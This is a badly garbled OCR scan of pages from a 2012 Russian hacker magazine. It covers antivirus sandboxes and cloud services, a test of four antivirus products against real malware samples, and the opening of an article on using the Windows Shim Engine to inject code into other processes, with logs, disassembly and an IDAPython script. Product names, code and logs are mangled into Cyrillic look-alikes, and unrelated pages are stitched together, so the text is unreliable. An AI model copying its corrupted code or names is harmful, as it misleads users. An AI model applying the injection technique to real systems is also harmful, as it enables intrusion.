В этом случае решение о запуске в песочнице 
принимается на основе результатов работы 



эвристического анализатора. Так работают 
песочницы из состава большинства анти- 
вирусных продуктов (в частности Казрегзку 
Іпіегпеі Бесигііу и Сотосіо Іпіегпеі 5еси гііу 
Рго). 

Что касается режимов работы, то их тоже 
два — режим постоянной защиты и режим 
ручной защиты. В первом случае приложение 
автоматически помещается в песочницу либо 
выполняется вне ее в зависимости от резуль- 
тата работы модуля принятия решения при 
старте приложения. Во втором — пользователь 
сам принимает решение о запуске процесса 
внутри песочницы. К примеру, для БапсіЬохІЕ 
(песочница на основе частичной виртуализа- 
ции] основным режимом работы является ре- 
жим ручной защиты, но при покупке лицензии 
можно активировать режим постоянной за- 
щиты с принятием решения на основе правил. 



Для песочницы из состава Сотосіо Іпіегпеі 
Бесигііу основной режим — режим постоянной 
защиты с эвристическим алгоритмом принятия 
решения. Однако помимо этого существует 
возможность ручного запуска приложений 
в песочнице. 



ЗАКЛЮЧЕНИЕ 



Конечно, некоторые детали остались за 
кадром, да и разработчики в антивирусных 
лабораториях все время изобретают что-то но- 
вое, пытаясь догнать и перегнать создателей 
вредоносного программного обеспечения... Но 
главное, что все эти антивирусные премудро- 
сти обрели порядок и свое место на много- 
численных полочках в твоей голове. Атам, 
глядишь, и ты придумаешь что-нибудь такое, 
что произведет революцию в антивирусном 
деле, и редактору придется выделять место 
под новые статьи в нашем журнале. НЕ 




ОБЛАЧНЫЕ ТЕХНОЛОГИИ НА АНТИВИРУСНОЙ СЛУЖБЕ 



Началом применения облачных технологий в антивирусном 
деле можно, наверное, считать предоставление 
антивирусными компаниями возможности онлайн-проверки 
файлов на вредоносность. Эта возможность существует 
и по сей день, но под облачными технологиями в сфере 
антивирусной защиты сегодня понимается уже совсем 
другое. Почти все крупные антивирусные компании 
используют облака в качестве огромной антивирусной базы, 
причем фактически пополняемой самими пользователями, 
давшими согласие на участие в программе пополнения 
и уточнения информации о вредоносных и потенциально 
вредоносных объектах. В разных антивирусных компаниях 
это называется по-разному. У МісгозоН Бесигііу Еззепііаі 
— «Служба динамических сигнатур 055 Шупатіс Бідпаіиге 
Бегѵісе)». Если на выходе проактивной защиты файл будет 
расценен как подозрительный (к примеру, пытается изменить 
системные файлы), но сигнатурный анализатор на него 
никак не отреагировал, то создается профиль этого файла, 
который отсылается для анализа в специальные сервисы 
МісгозоК — 055, БруІМеІ: и МВ5 (МісгозоН ГСеріЛаІіоп 5егѵісе5). 
В случае, когда в базе обновления сигнатура уже есть, но она 



еще не скачана, автоматически происходит обновление баз. 

В сигнатурах содержится не только часть тела вируса или его 
хэш, но и некоторые типичные сценарии поведения, которые 
позволяют однозначно определить вредоносность программы. 
В антивирусах от компании Сотосіо та же самая фигня носит 
название «Облачный анализ поведения приложений», и с 
его помощью подозрительные файлы отправляются на 
дополнительный анализ. 

Говоря про облачные технологии в сфере борьбы 
с вредоносными программами, нельзя не упомянуть 
«Лабораторию Касперского» с ее Казрегзку 5еси- 
гііу Меіѵѵогк. К5ІЧ — сеть информационной безопасности, 
позволяющая пользователям получать оперативные 
данные о репутации программ и веб-сайтов, оперативно 
реагируя на появление новыхугроз. С помощью К5ІЧ в новых 
антивирусных программах от «Лаборатории Касперского» 
реализованы функции веб-фильтра, антифишинговый 
модуль, функция контроля программ (рейтингование софта 
по признакам опасности при назначении доступа к ресурсам 
ПК и персональным данным) и модуль анти-спам, который 
обращается в К5ІЧ за образцами спам-писем. 




В случае использо- 
вания песочницдля 
изоляции выполняе- 
мого кода следует 
помнить, что многие 
изнихвиртуализи- 
руют далеко не всю 
систему. Как пра- 
вило, это несколько 
критически важных 
объектов, например: 
папки Ргодгат 
Рііез, ѴѴіпсІоѵѵ5, 
ІІ5ег5\%АІІІІ5е- 
г5РгоИІе%\Ргодгат 
йаіа, Ооситепіз 
апсІБеНіпд и ветвь 
реестра НКІ_М\ 
БоКѵѵаге. 

Про обфускацию 
.^ѵа-скриптов очень 
хорошо написано 
в статье «.ЛаѵаБсгірі: 
игры в прятки» 
в девятом номере ][ 
за 2011 год. 
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ИСПЫТЫВАЕМ ЭВРИСТИКУ 
АВЕРОВ НА САМЫХ НОВЫХ 
ВИРУСАХ 



Как известно, антивирусное ПО работает в полную силу 
только в том случае, если своевременно получает свои 
апдейты. Об этом догадываются и вирмейкеры, которые 
выпускают новые версии зловредов чуть ли не каждый день 
Сегодня мы проверим, насколько хорошо аверы справятся 
с самыми свежими экземплярами вирусов и троянов, 
которых еще нету них в базах. 



егодняшние испытания мы будем 
проводить на реальных зловредах, 
которых написали реальные киберз- 
лодеи для своих реальных киберзлодейских 
нужд. Напомним, что для всех наших предыду- 
щих тестов мы писали собственные сэмплы, 
которые хоть и не были настоящими зловреда- 
ми, но усиленно старались ими представиться. 
Настоящие же трояны должны показать, кто 
из производителей антивирусных программ 
лучше отрабатывает деньги, с таким трудом 
добываемые их клиентами. Но чтобы проверка 
была еще хардкорней, мы раздобыли пачку 
самых свежих представителей патогенной 
киберфауны, а для большей надежности еще 
и отключили автообновление наших испытуе- 
мых примерно за неделю до отлова зловредов. 

Кстати, об испытуемых антивирусах. Сегод- 
ня к нам в лабораторию попало следующее за- 
щитное ПО: Казрегзку СРѴ5ТАІ., йг.ѴѴеЬ Зесигііу 
Зрасе, Е5ЕТ N0032 5тагІ Зесигііу 5 и Аѵіга Ргее 
Апііѵігиз. Все претенденты на звание лучшего 
из лучших (или, наоборот, худшего из худших) 
нам уже давно знакомы. Стоит сказать лишь 
про ПО от немцев — пусть тестируемая версия 
Аѵіга и бесплатная, но она давно считается 
одним из самых параноидальных антивирусов 
среди современного зоопарка защитного про- 



граммного обеспечения. Вирмейкеры в своих 
ТЗ выделяют Авиру в отдельный пункт, а по 
уровню причиняемой головной боли этого 
авера можно сравнить разве что с ІЕ6, который 
портит нервы добрым и трудолюбивым вер- 
стальщикам и ѵѵеЬ-кодерам. 



УСЛОВИЯ ТЕСТИРОВАНИЯ 



Для тестов мы засетапили на вируталку све- 
женькую ѴѴіпсІоѵѵз ХР зрЗ со всеми апдейтами, 
а затем начали устанавливать антивирусы, 
попутно создавая снапшоты виртуальной 
машины для каждого из аверов, чтобы они 
не мешали друг другу. Затем мы быстренько 
проапдейтили базы сигнатур до актуального 
состояния и оставили все это хозяйство на не- 
делю в темном прохладном месте без интер- 
нета, чтобы наши испытуемые ненароком не 
обновились. 

Через неделю мы пошли за свежей малва- 
рью — описание этой разношерстной компании 
ты можешь видеть на врезке. 

Но кое-какую исследовательскую работу 
мы все-таки провели — открыли вирусные 
файлики в Ьех-редакторе и посмотрели на них 
с полминутки. В итоге мы смогли рассмотреть 
два зѵѵі'-файла, один ѴізиаІ Вазіс Бсгірі, один 
Эаѵа-скрипт, четыре исполняемых ехе-файла 



(три из которых были пожаты ІІРХ) и два зага- 
дочных файла с расширением Іре, которые из- 
нутри были похожи один на рсК, а другой — на 
2 Ір-архив. Всего получилось десять зловредов. 

Само тестирование у нас будет проходить 
в два этапа. На первом этапе мы натравим 
антивирусы с несвежими базами на найденные 
трояны и запишем результат. Таким образом мы 
проверим, насколько хорошо аверы справляют- 
ся с новым, неизвестным им вредоносным ПО. 
Вторая часть испытаний состоится через неде- 
лю после первой. Мы дадим антивирусам время 
на обнаружение и детект наших зловредов, за- 
тем обновим базы и просканим вредоносов еще 
раз. Это позволит нам узнать, насколько плохо 
противовирусное ПО справилось в первый раз. 



НАЧИНАЕМ ТЕСТИРОВАНИЕ 



Итак, мы подождали, пока антивирусные базы 
достаточно устареют, и начали тестирование. 
Сегодня аверы будут идти в алфавитном поряд- 
ке, поэтому первым пойдет Аѵіга Ргее Апііѵішз. 
Для чистоты эксперимента мы вообще вы- 
дернули сетевой кабель из машины, на которой 
собираемся проводить тесты, — современные 
антивирусы очень любят скрытно обновлять 
себя, сливать инфу о файлах на свои сервера 
и использовать всякие облачные технологии. 
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Рг.ѴѴеЬ справился с неизвестной ему угрозой лучше всех 





Результаты Каспера без обновленных баз 




Доктор Веб совсем плох, свежие базы сигнатур ему не помогли 



Казрегзку отжог: Іоіаі сіеіесііоп 



Поэтому, чтобы все было честно, доступ к сети 
был жестко ограничен. Также мы отключили 
файловые мониторы и прочие фоновые про- 
верки, чтобы эти компоненты защитного ПО не 
мешали скопировать наш минизверинец на ПК. 

Но вернемся к испытаниям. Распаковав ар- 
хивчик со зловредами в специально отведен- 
ную для них директорию, мы кликнули по этой 
директории правой кнопкой мыши и выбрали 
пункт Бсап. Не слишком расторопная Авира 
немного призадумалась, но затем все же заня- 
лась сканированием, после чего выдала окно 
с результатами. Из десяти вредоносных файлов 
Аѵіга обнаружила только один, обозвав его йР/ 
ОеІрЫ.Сеп. Благодаря гуглу, официальному 
сайту и помощи Капитана Очевидность мы 
выяснили, что своему детекту зловред обязан 
эвристическому движку антивируса. Таким об- 
разом, эвристика сработала, но не совсем так, 
как того хотелось бы германским программи- 
стам. Результат 1/10 хоть и лучше, чем ничего, 
но как-то не внушает особенного оптимизма. 

Следующим идет йг.ѴѴеЬ Бесигііу Брасе. 
Зеленый паук был натравлен на туже самую 
папку. Сканирование прошло быстро, и его 
результаты оказались получше, чем у пред- 
шественника. Главной угрозой стал все тот 
же 0Р/0еІрЫ.6еп, но уже с новым именем 
— Тго)ап.МиЮгор. 20121. Судя по названию, 
файлик был обнаружен с помощью конкретной 
сигнатуры, которая была в базе уже довольно 
давно. Число 20121, видимо, означает размер 
вредоноса, но у нашего зверька этот размер 
немного отличается — 20992 байт. Повезло 
доктору, или ему действительно удалось так 



качественно выделить сигнатуры, мы не знаем, 
но факт остается фактом, — трой обнаружен. 
Остальные два детекта — это эксплоиты. 
Первый эксплуатируетуязвимость в формате 
рсК, о чем недвусмысленно говорит название 
вируса (ЕхрІоіСРОР.2633), а второй покушается 
на РІазЬ — ЕхрІоіІ.ЗѴѴР.1 93. Стоит напомнить, 
что у нас было два зѵѵЕфайла, но опасным 
был признан только один. Так же следует 
сказать, что эксплоиты обычно не содержат 
какого-либо вредоносного кода, а служатлишь 
для загрузки настоящих вирусов. Аѵіга Ргее 
Апііѵігиз не обнаружил этих файлов — возмож- 
но, потому что понадеялся перехватить более 
серьезную угрозу (но, как оказалось в итоге, 
сделать этого не смог). Доктор Веб же поступил 
более продуманно, попытавшись обезвредить 
заразу на ранних этапах наступления. Тго)ап. 
МиЮгор. 20121 также является загрузчиком 
других вирусов. 

Итак, йг.ѴѴеЬ обнаружил три угрозы из 
десяти, что лучше, чем у немецкого антивируса, 
но все равно недостаточно хорошо для защиты 
системы. Следующий у нас в списке Казрегзку 
СРУБТАБ. Забегая вперед, скажем, что его 
результаты нельзя трактовать однозначно, но 
обо всем по порядку. 

После сканирования вирусной директории 
мы получили сообщение, говорящее нам о трех 
обнаруженных угрозах. Чтобы рассмотреть 
получше, что же там нашел каспер, мы решили 
взглянуть на подробный отчет, но тут нас ждал 
сюрприз — в табличке с найденными злов- 
редами было всего два файла. Первый — это 
уже хорошо известный нам 0Р/0еІрЫ.6еп, но 



уже под другим именем (НЕІіР:Тго)ап.ѴѴіп32. 
Сепегіс). Программка-загрузчик своих старших 
братьев стабильно детектится нашими анти- 
вирусами. Второй угрозой был рсК-эксплоит, 
обнаруженный Доктором Вебом, но имя по вер- 
сии Лаборатории Касперского у него немного 
другое — НЕІІП:ЕхрІоіС5спрСбепегіс. Видно, 
что в обоих случаях отработала эвристика, но 
непонятно, почему в отчете нет информации 
отретьем опасном файле, ведь в первоначаль- 
ных результатах говорилось о трех угрозах. 

Мы не можем сказать, был ли детект третьего 
зверька, а потому засчитываем только два 
положительных срабатывания эвристики, что 
дает нам результат 2/10. 

Последним идет N0032. Сканирование 
все тех же файлов завершилось сообщением 
об одной найденной угрозе. Самые догадли- 
вые уже, наверное, поняли, что это был тот 
самый ехе-загрузчик, который попался трем 
предыдущим антивирусам. На этот раз его имя 
было ѴѴіп32/Іп)есІог.РР. К сожалению, мы так 
и не смогли понять, сработала ли тут сигна- 
тура в базе или эвристический движок, но 
одно очевидно: результат 1 из 10 — это плохой 
резул ьтат. 



ВТОРОЙ ЭТАП ИСПЫТАНИЙ 



После того, как мы протестили аверов не- 
известными для них троянами, мы оставили 
их в покое на недельку, а потом обновили 
базы сигнатур. За неделю любой уважающий 
себя антивирус должен переловить всех на- 
ших зловредов и научиться безжалостно их 
уничтожать. Ну что же, проверим, так ли это 



ХАКЕР 04/159/2012 



081 






МАШАКЕ 




Скромные результаты Аѵіга Ргее Апііѵігиз 



После обновления у Авиры все намного лучше 




N0032 — совсем как Аѵіга 




на самом деле. Со свежими базами Авира по- 
казала себя ровно в шесть раз лучше, чем на 
первом этапе, но четыре файла так и не были 
идентифицированы спустя неделю после их 
выхода в дикую природу. Также интересно, 
что Аѵіга обнаружила рсК-эксплоит, который 
ранее не видела, хотя его коллеги ругались 
на него в первую очередь. Э5, который неде- 
лю назад не обнаруживался ни одним авером, 
на этот раз попал в поле зрения немецкого 
защитного ПО, назвавшего его НТМ1_/01сг. 
Оаѵѵп.С.2. Остальные детекты — это ехе- 
файлы, а зѵѵі'-эксплоиты были отпущены на 
свободу. Шесть из десяти — таков результат 
Аѵіга Ргее Апііѵішз со свежими базами. 

Теперь очередь Бг.ѴѴеЬ. После обновле- 
ния баз мы не увидели такого прогресса, как 
у предыдущего антивируса. Всего лишь четыре 
из десяти: к списку вредоносов добавился один 
исполняемый файл, который окрестили как 
Тго)ап.5М55епс1.1950. Больше ничего подозри- 
тельного доктор не обнаружил. 

Касперский проявил себя иначе. Просканив 
директорию с вирусами, он выдал неприлично 
большое число инфицированных объектов, 
что скорее всего означает распаковку и про- 



чие разоблачающие действия, которые были 
выполнены в процессе проверки. В итоге 
Казрегзку Сгузіаі со свежими базами обна- 
ружил все десять зловредов, большинство 
из которых были уничтожены в первые же 
секунды, хотя два файла по непонятным нам 
причинам так и остались лежать на жестком 
диске. Такой результат заслуживает уважения, 
которое, однако, может быстро рассеяться, 
если мы вспомним результаты первой части 
тестирования. 

Е5ЕТ N0032 выступил с результатом, иден- 
тичным Авире — шесть из десяти. Правда, на- 
бор детектируемых файлов немного отличался 
— больше эксплоитов, меньше ехе-файлов, — 
но это не особенно влияет на общую оценку. 

Атеперь настало время для подведения 
итогов. 



НАГРАЖДЕНИЕ 



Мы решили, что называть лучшего в этих 
испытаниях будет не совсем правильно, 
поэтому вместо первого, второго и так да- 
лее мест мы раздадим кубки за достижения 
в различных номинациях. Первый кубок — 
«За самые посредственные результаты» — 



получают Аѵіга и Е5ЕТ (кубок один, потому 
пусть они сами решают, у кого на полочке 
он будет стоять). Всего один обнаруженный 
зловредв первом испытании — это чуть 
лучше, чем ничего, а шестьтроянов после 
обновления баз можно назвать улучшением 
ситуации на 600% или «ваша система все 
равно будет инфицирована, даже если вы 
регулярно обновляетесь». 

Кубок «За лучшие базы сигнатур» по- 
лучает антивирус Касперского, 10/10 — это 
действительно впечатляет. Правда, если ты 
схватишь совсем свеженький вирус (а настоя- 
щие киберзлодеи об этом позаботятся), то тебе 
скорее всего захочется расколотить этот кубок 
об голову победителя. 

Антивирусу Бг.ѴѴеЬ достается сразу два 
кубка: «За самую отчаянную борьбу с неиз- 
вестными доселе зловредами» и «За самый 
отстойный детект с обновленными базами». 
Слишком медленно добавляете сигнатуры, 
господа, слишком медленно. 

На этом мы прощаемся с тобой и спуска- 
емся обратно в наш подвал-лабораторию, где 
займемся новыми бесчеловечными опытами 
и тестами. ИИ 



А ЧТО ЖЕ ЭТО ЗА ВИРУСЫ ТАКИЕ? 



Чтобы тестирование было максимально честным, мы собрали 
представителей самых разных областей зловредного мира. Один 
из вредоносов «выбрасывает из себя» множество разнообразной 
малвари — троянцев, бэкдоров и прочей нечисти. Этим и объясняется 
удивившее автора расхождение в количестве детектов. Другой вообще 
представляет собой скрипт на языке ѴВ5, основными назначениями 
которого являются загрузка и запуск другого троянца. Еще в файлах, 
участвующих в тесте, присутствовал эксплойт, эксплуатирующий СѴЕ- 
201-0611. Скриптовый троян-загрузчик, аналогичный вышеописанному, 
но созданный на Э5, тоже попал в выборку. Не обошлось и без 
ѵѵіпіоскег'а — вредоноса, блокирующего работу системы, а затем 



требующего оплаты за разблокировку. Не отказались мы и от 
мобильного сектора — троянец, отправляющий СМС на платные 
номера, тоже попал в исследование. Кроме того в тесте участвовала 
мошенническая программа, относящаяся к категории «платных 
архивов» (такие программы требуют отправить СМС на премиум-номер 
якобы за получение доступа к заархивированному файлу). Также был 
протестирован РОР-эксплойт, вариации которого широко используются 
в эксплойт-паках для проведения сігіѵе-Ьу атак. Наконец, в тесте 
участвовали троянец, выполняющий множество деструктивных 
действий, и вредоносный НазИ-файл, осуществляющий загрузку 
и запуск зловреда. 
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ТМЕ-КРИПТОВАНИЕ 

Сегодня у нас сложная задача — сделать 
шифровалку данных, которая позволя- 
ла бы создаватьневидимые всистеме 
контейнеры и использовала собствен- 
ный криптографический алгоритм. За 
основумы возьмем известную программу 
ТшеСгурС которая распространяетсяс 
открытыми исходи иками. Убедившись в 
отсутствии в ней закладок, мы создадим 
«доверенный» билдутилиты, в котором 
точно будетвсеок. Недоверие кзару- 
бежным шифрам издоровый патриотизм 
наталкиваютна мысль реализовать 
отечественные криптографические ал- 
горитмы, которые во многом неуступают 
зарубежным аналогам. Этим и займемся, 
благо сделать это не сильно-то и сложно. 







КОДИНГ 



ІЛІІХОШ 
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5НІМ: НОВЫЙ МЕТОД ИНЖЕКТА 

Способы инжекта кода в атакуемое при- 
ложение давно известны. Однако оста- 
лисьтакиетехнологии какБЫт Епдіпе, 
которые еще могуттебяудивить. 



106 



ЗВЕНЬЯ ОДНОЙ ЦЕПИ 

Одним из главныхновшествядра І_іпих 
версии 2.6стала поддержка виртуальной 
файловой системы 5уз^5. Какэто может 
быть полезно обычным пользователям? 



111 



БИТВЫ ЗЕЛЕНЫХ РОБОТОВ 

Стандартная прошивка для АпсІгоісІ- 
смартфона — уделтети Клавы, когда есть 
мощные альтернативные Лгтѵѵаге в лице 
СуаподепМосІ и МИЛ. 



5УЫХАСК 



РЕККІІМ 






НЕИЗМЕННО ВЫСОКАЯ ДОСТУПНОСТЬ 




СВЕЖЕЕДЫХАНИЕ 




122 


НОѴѴТО: как создать высоко производи- 
тельный и устойчивый к сбоям файловый 


128 


Вэтом году корпорация МісгобоЙ прак- 
тически полностью обновит линейки 


139 



сервис на базе парочки стареньких своих основных продуктов. Кратко прой- 

серверови5атЬа. демся по всем основным новинкам 2012. 



СЕТЕВОЙ ФОРСАЖ 

Редакция решила, наконец, обновить 
свои старыеточки доступа. Берем пять 
топовых беспроводных маршрутизато- 
ров и выбираем из них лучший. 
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новый метод инжекта 



ИСПОЛЬЗОВАНИЕ 
5НІМ ЕЫОІЫЕ ДЛЯ 
ВНЕДРЕНИЯ КОДА 
И АВТОЗАГРУЗКИ 



Существует множество способов инжекта кода в атакуемое 
приложение, это и правка импорта сторонней сІІІ, и атака 
типа сІІІ гесіігесііоп, и создание удаленного потока, и посылка 
арс с адресом І_оасИ_іЬгагу. Способов уйма, но все эти 
способы довольно хорошо известны. Можно ли удивить чем- 
то искушенного читателя? Попробуем. 



ЧТО ТАКОЕ ЗНІМ’Ы ? 



5Ыт Епдіпе — это технология для обеспечения совместимости 
старших версий ѴѴіпсІоѵѵв с младшими, реализованная в различ- 
ных сІІІ, а также через некоторые калбеки и хаки в РЕ-загрузчике 
библиотеки пісііі.сііі. 

На уровне пользователя посмотреть на режимы совместимости 
можно на соответствующей вкладке свойств любого исполняемого 
файла: 

зоше.ехе Свойства Совместимость -> Режим 
Совместимости -> і лііпсіоыбЭБ 

<- будет использоваться шим совместимости с ілііпсіомв 95 

Что значит «будет использоваться»? Это значит, что из стан- 
дартной базы шимов будет извлечена некоторая информация, на 
основе нее будет загружена стандартная сІІІ для совместимости, 
в которой есть опять-таки стандартные функции. И именно ими бу- 



дут заменены функции в таблице импорта приложения вопле. ехе. То 
есть механизм обратной совместимости в ѴѴіпсІоѵѵв обеспечивается 
банальным перехватом АРІ. 

Использование шимов позволяет очень многое, от простых 
вещей вроде добавления флагов в РЕВ, до виртуализации реестра 
и полного изменения поведения Неар Мападег'а. 

К примеру, шим, виртуализирующий реестр, перехватывает 
практически все функции работы с реестром в А0ѴАРІ32.0ЕЕ: 

Ке§Соппес1:Ке§І5І:гуА, Ке§Соппес1:Ке§ІБІ:гуІлІ, Ке§ОрепКеуЕхА, 

Ке^Оре пКеѵЕх ІлІ . Ке§ Ои егу Ѵ а1иеЕх1лІ, К е ^СІ о веКеѵ . 

Ке^ОрепКеуІлІ., Ке§(2иепуѴа1иеА., Ке§(2иепуѴа1иеІлІ., 
Ке§Сгеа1:еКеуА л Ке§Спеа1:еКеуІлІ., Ке§Сгеа1:еКеуЕхА., 
Ке§Сгеа1:еКеуЕхІлЦ Ке^ЕпшпѴаІиеА., Ке§ЕпитѴа1иеІлІ, 
Ке^ЕпитКеуА, Ке^ЕпитКеуЫ. Ке^ЕпитКеуЕхА, Ке^ЕпитКеуЕхЫ, 
Ке^ОиегѵІп-РоКеѵА. Ке^ОиегѵІп-РоКеѵЫ. Ке^5е1:Ѵа1иеЕхА. 
Ке § 5е1=Ѵа1иеЕх1лІ , Ке^Р еІ еІге Кеу А . Ке §Ре1е 1=еКе у 1лІ 







БЫт: новый метод инжекта 




Добавляем свое приложение в ЕМЕТ 



Далее мы разберемся, как работает БЫт Епдіпе и как его мож- 
но использовать в наших целях, а цели у нас простые - загрузить 
свой код в чужой процесс. 

ИССЛЕДУЕМ ШИМЫ 

Чтобы понаблюдать работу шимов, можно включить режим 
логирования. Для этого надо установить системную переменную 
окружения 5НІМЕМ6_0ЕВІІ6_І_ЕѴЕІ_ равной 4 и перезагрузиться 
(перезагрузка требуется при любых изменениях или добавлениях 
системных переменных окружения]. 

Если после этого запустить любое приложение (пусть это будет 
блокнот, переименованный в Іезіехе) в режиме совместимости 
с, например, ѴѴіпсіоѵѵб 2000 и включить ѴѴіпйЬд, можно наблюдать 
любопытные логи. Например, такие: 

[ІІМРО] [5еі5еіІ.аѵегЕпѵѴаг] Епѵ ѵаг зеі _СОМРАТ І.АУЕК="1лІіп2ѲѲѲ" 
[ІІМРО] [БЕ РШоасІесІ] ІІМІТ. Іоасііп? РЫ. "АсІ.аѵег5 .РЫ." . 



[М5С ] [Беііпіі] БІііт РЩ 0x71660000 "С: \ІлІІІМРОІлІ5\АррРаісІі\ 
АсІ_ауег5.РІ_І_" ІоасІесІ 

[М56 ] [Беііпіі:] іібіп^ БНІМ "ІлІіп2ѲѲѲѴег5ІопІ.іе!АсІ-аѵег5 .РЫ." 

[ ІМРО] [Беііпіі:] беіНоокАРІз геіигпз 3 ІіоокБ -Рог РЫ. "С:\ 
МINР0М5\АррРаісI^\Ас^ауе^5.Р^^ ,, БНІМ "ІлІіп2000Ѵег5ІопІ_іе" 

[М5С ] [Беііпіі:] іібіп§ БНІМ "Ѵігіиа1Ке§І5ігу !АсІ_ауег5.РІ_І_" 

[М5С ] [Беііпіі] СоттапсІ ^пе -Рог БИіт "Ѵігіиа1Ке§І5ігу" : 
"ІЛІІІМ2К" 

[ІІМРО] [Беііпіі] беіНоокАРІБ геіигпз 27 ІіоокБ -Рог РЫ. "С:\ 
1лІІМР01лІБ\АррРаісІі\АсІауег5 .РИ" БНІМ "Ѵігіиа1Ке§І5ігѵ" 

[МБС ] [Беііпіі] іібіп§ БНІМ "Рир1ісаіеНапсІ1еРіх!АсІ_ауег5.ои_"_ 
[ІІМРО] [Беііпіі] СеіНоокАРІБ геіиппБ 1 ІіоокБ -Рог РІ_І_ "С:\ 
ІлІІІМР0ІлІБ\АррРаісІі\АсІ_ауег5 .РІ_І_" БНІМ "РирІісаіеНапсЛеРіх" 
[ІІМРО] [БЕ РШоасІесІ] ІІМІТ. Іоасііп^ РЫ. "АсбепгаІ.Ри." . 

[МБ6 ] [Беііпіі ] 1)5І п§ БНІМ "І оасНіЬгагѵСІлІР! Асб еп гаі .РИ" 

[ІІМРО] [Беііпіі] СеіНоокАРІБ геіигпБ 0 ІіоокБ -Рог РЫ. "С:\ 
IлIINРОIлI5\АррРаісI^\АсСеппа1.Р^^ ,, БНІМ "ІоасНіЬгагуСІлІР" 

[М5С ] [Беііпіі] іібіп§ БНІМ ’Шп2кРгора§аіеІ_ауег !АсІ_ауег5.РІ_І_" 
[ІІМРО] [Беііпіі] (ЗеіНоокАРІБ геіиппБ 3 ІіоокБ -Рог РЫ. "С:\ 
ІлІІМР0ЫБ\АррРаісІі\АсІаѵеп5 .РИ" БНІМ "1лІіп2кРгора^аіеІ_аѵег" 

Из них видно, что загрузился слой ѴѴ і п 2 0 0 0, а также 
стандартная зіііт сІІІ - С:\\Л/ІІ\Ш0ѴѴ5\АррРаІсІі\АсІ_ауег5.0и_. 
После этого произошло извлечение и применение шимов, 
таких как ѴігіиаІРедізігу, ОирІісаІеНапсІІеРіх и так далее, 
а затем уже перехват функций (перехватов много, логи 
поскипаны).В реестре тем временем сформировалась следующая 
запись: 




Включаем режим логирования шимов 

[НКЕУ_СІІККЕМТ_ІІ5ЕК\5о-Ріыаге\Місго50-Рі\ІлІіпсІоы5 ІМТ\ 
СиггепіѴег5Іоп\АррСотдаіР1а§5\І_ауег5] 

"С: \\Роситепі5 апсі Беіііпе5\\АсІтіп\\Рабочий стол\\іезі. 
ехе" = "1лІІІМ 2ѲѲ0" 



Как видишь, она указывает, что для Іезіехе должен при- 
меняться шим ѴѴіп2000. Вероятно, это значит, что мы можем 
устанавливать режим совместимости любому приложению при- 
нудительно. Это нам пригодится. Однако для внедрения своего 
кода мы должны не столько прописать, сколько установить для 
него свой (!) режим совместимости. То есть придется создать 
и внедрить в систему свою собственную базу шимов. Реше- 
ние о том, как это сделать, не лежит на поверхности. В ветке 
АррСотраіРІадз больше ничего интересного нет. Поэтому при- 
дется копнуть немного глубже. 



ИЩЕМ СПОСОБ ВНЕДРЕНИЯ СВОЕЙ БАЗЫ ШИМОВ 



Забегая вперед, скажу, что БЫт Епдіпе в основном реализо- 
ван в зЫтепд.сІІІ и аррЬеІ р.сІІ I, а базы шимов лежат в зузтаіп. 

5СІ Ь и сІгѵтаіп.зсІЬ (в директории \ѴѴІ N 00ѴѴ5\Арр РаісЬ), однако 
загрузкой стандартной сІІІ шимов, парсингом базы и перехватом 
функций занимается непосредственно загрузчик РЕ-модулей 
ѴѴіпсІоѵѵз. Тот самый, что сидит в ЫсІІІ.сІІІ. Конечно, чтобы лучше 
понять, как внедрить свою базу, начать исследование лучше 
всего с момента загрузки БЫт Епдіпе, а искать этот момент луч- 
ше всего с начала работы системного загрузчика, а системный 
загрузчик начинает работу с арс-диспетчера. 

Но мы не будем закапываться в такие недра и начнем с функции 
инициализации вышеупомянутого загрузчика РЕ-файлов: 



_І_сІгрІпіііа1І2еРгосе55 : 



.іехі:7С921В36 


тоѵ 


еах., 1ап§е Тб:18іі ; ТЕВ 


.іехі:7С921ВЗС 


тоѵ 


еЬх, [еах+301і1 : РЕВ 




.іехі:7С921В62 


Іеа 


еах., [еЬх+1Е8Іі] ; реЬ->р5ІіітРаіа 


.іехі:7С921В68 


тоѵ 


есх. Геахі 




.іехі:7С921В87 


тоѵ 


[еЬр+ѵаг 1041. есх 





Іос 7С921693 : 



. іехі:7С921693 
. іехі:7С921699 



тоѵ 

хог 



есіі [ еЬр+ѵа г_1 04 ] 
езі, езі 



. і ехі: 7С92169В 



стр 



есіі, езі 



. і ехі : 7С92169 Р дг 1ос_7С923СР0 

; если первый ЦІ.ОІМ(з в реЬ->р5ІіітРаіа == 0. 

; то прыгаем (в случае включенного шима 

; совместимости прыжка не происходит^) 
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Логи шимов в ѴѴіпйЬд 



^іехі : 7С9216АЗ ризіі есіі 



.іехі:7С9216А4 


ризЬ 


[еЬр+ѵаг 08 ] 


.іехі:7С9216АА 


тоѵ 


[еЬх+ІЕСбІ, езі 


.іехі:7С9216В0 


ризЬ 


есіі 


.іехі : 7С9216В1 


саіі 


І_сІгрІ_оасІ5ЬітЕп§іпе(а)12 


; а вот и 


момент 


загрузки движка шимов 



В ЫгрІоасіЗЫтЕпдіпе первым параметром передается 
зЫтепд.сІІІ. 

ЫгрІ_оасІ5ЫппЕпдіпе грузит эту сІІІ, получает адреса функций 
из нее (БсІгрбеіБЫппЕпдіпеІпІегІасе), загружает базы шимов 
(БсІЫпііОаІаЬазе), распаковывает их (БсІЫІпраскАррСотраіОаІа) 
и применяет. Именно отсюда мы узнаем, что движок совме- 
стимости живет в зЫтепд.сІІІ. Давай поищем в этой сІІІ строки, 
содержащие ключи реестра, может быть найдем какие-нибудь 
недокументированные ключи, которые укажут нам, как внедрить 
в систему свою базу шимов? Проще всего строки искать скрип- 
том. Я предпочитаю питон(ІсІаРуіЬоп): 

ітрогі ісіаарі 
ітрогі ісіаиіііз 
ітрогі: ісіс 



сіе-р ЕпитБігіп^зО : 



з = ісіаиіііз. 5ігіп§з( Раізе ) 

з.зеіир( зіігііѵрез = Бігіп^з.БТК ІШСОРЕ | Бігіп^з.БТК С ) 



-Рог і. ѵ іп епитегаіе( з ): 
і-р ѵ із ІМопе: 

ргіпі: ( "Раііесі оп %сІ" %Х ) 
еізе: 

ргіпі ( "%х => %з" % ( ѵ.еа. зіг( ѵ ) ) ) 



ргіпі "Бсгірі БіагіесІ. . . " 

Епит5ігіп§з( ) 

ргіпі "Бсгірі ЕпсІесІ..." 

ісіаиіііз. 5іппдз(БаІзе) — в конструкторе по умолчанию стоит 
Тше, но так как нас интересуют помимо обычных строк еще и юни- 
кодные, то ставим сІеРаиІі зеіир = Раізе и настраиваем зеіир сами. 
Выполняем скрипт на загруженной в ЮА библиотеке, просматрива- 
ем выведенные строки и почти в самом конце находим интересный 
ключ: 

